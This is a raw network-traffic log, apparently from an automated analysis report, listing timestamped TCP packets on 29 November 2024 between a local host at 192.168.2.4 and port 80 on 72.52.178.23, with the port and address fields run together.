                                                                                Nov 29, 2024 01:52:20.048150063 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.048192024 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.048218012 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.080275059 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.089272976 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.089421034 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.199129105 CET804975572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.199198961 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.203768015 CET4975780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.209323883 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.209431887 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.253278971 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.253349066 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.323642015 CET804975772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.323725939 CET4975780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.328190088 CET4975780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.373286963 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.373347998 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.448091030 CET804975772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.541352034 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.541399956 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.745345116 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.745407104 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.754261017 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.754332066 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.865503073 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874396086 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874408007 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874521971 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874536037 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874608040 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.874634981 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.985289097 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.985397100 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.985465050 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.105632067 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.194003105 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.314078093 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.314156055 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.314338923 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.314412117 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.314488888 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.314515114 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434215069 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434346914 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434379101 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434470892 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434521914 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434545994 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434587002 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434640884 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434657097 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434691906 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434691906 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434720993 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434771061 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434777021 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434823036 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434843063 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434866905 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434892893 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434920073 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.434946060 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.434961081 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.513675928 CET804975772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.513735056 CET4975780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.513792992 CET4975780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.554629087 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.554656029 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.554730892 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.554734945 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.554790020 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.554841042 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.601391077 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.601531029 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.633821011 CET804975772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.636115074 CET4976080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.717361927 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.717489958 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.756190062 CET804976072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.756373882 CET4976080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.756469011 CET4976080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.765331984 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.765388012 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:21.876386881 CET804976072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.881361961 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.977401018 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:21.978374004 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.226883888 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.226983070 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.270303965 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.270378113 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.347163916 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390412092 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390424967 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390489101 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390497923 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390604973 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390613079 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.390619993 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.498809099 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.498871088 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.498909950 CET4975980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.618870020 CET804975972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.722749949 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.842747927 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.842853069 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.842962980 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.843040943 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.843097925 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.843209982 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.963561058 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964217901 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964230061 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964238882 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964282036 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964304924 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964309931 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964334011 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964353085 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964371920 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964406013 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964415073 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964448929 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964453936 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964494944 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964775085 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964812040 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964821100 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:22.964823008 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:22.964863062 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.009393930 CET804976072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.009475946 CET4976080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.009583950 CET4976080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.084810972 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.084820032 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.084857941 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.084877014 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.084882975 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.084940910 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.112750053 CET4976280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.129497051 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.129585981 CET804976072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.129615068 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.233438969 CET804976272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.233510971 CET4976280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.233619928 CET4976280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.245349884 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.245630026 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.293332100 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.293395042 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.353513956 CET804976272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.409331083 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.505352020 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.505413055 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.753320932 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.753393888 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.797719002 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.797786951 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:23.873405933 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.917999983 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918010950 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918026924 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918035984 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918102980 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918112040 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:23.918143988 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.027463913 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.027720928 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.027720928 CET4976180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.147680998 CET804976172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.244497061 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.364489079 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.368813038 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.368957043 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.368984938 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.369057894 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.369090080 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.417506933 CET804976272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.420715094 CET4976280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.420762062 CET4976280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.488806963 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489023924 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489056110 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489064932 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489129066 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.489140987 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489150047 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489182949 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.489219904 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489265919 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489314079 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.489342928 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489351988 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489387989 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.489409924 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489546061 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.489593029 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.534729958 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.540700912 CET804976272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609200001 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609210968 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609252930 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.609286070 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609302998 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609410048 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.609438896 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.609491110 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.653359890 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.653443098 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.654649019 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.654717922 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.654834032 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.773464918 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.774724960 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.774914026 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:24.817367077 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.941394091 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:24.941452980 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.145448923 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.145531893 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.323052883 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.323165894 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.443231106 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.443267107 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.443279028 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.443295002 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.443434000 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.552797079 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.552897930 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.552989006 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.672967911 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.782831907 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.838035107 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.838373899 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.838433027 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.902909040 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.906394958 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906521082 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906553030 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906605005 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906630993 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.940849066 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.958424091 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026401997 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026680946 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026712894 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026738882 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026796103 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026870012 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026901007 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026918888 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026945114 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026988983 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027026892 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027029991 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027069092 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027098894 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027115107 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027143002 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027158022 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027206898 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027223110 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027255058 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027266026 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.060791969 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.062370062 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.062485933 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146845102 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146869898 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146915913 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146941900 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146949053 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146964073 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146992922 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.147002935 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.182346106 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.189332962 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.189518929 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.309485912 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.309556007 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.357383013 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.357444048 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.474939108 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.569438934 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.569494963 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.817429066 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.817639112 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.897185087 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.897264957 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.937751055 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017282009 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017298937 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017376900 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017394066 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017453909 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017489910 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017540932 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.136359930 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.136450052 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.136594057 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.245945930 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.246124983 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.246275902 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.256561995 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.363384008 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.366204977 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.409286022 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.483931065 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.484010935 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.484153032 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529261112 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.529453039 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529521942 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529521942 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529587030 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529613018 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.603997946 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649557114 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649655104 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649669886 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649677992 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649715900 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649736881 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649749041 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649786949 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649821043 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649847031 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649887085 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649888039 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649926901 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.650007010 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650019884 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650063992 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.650105953 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650115967 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650165081 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.769727945 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769747019 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769823074 CET4976880192.168.2.472.52.178.23
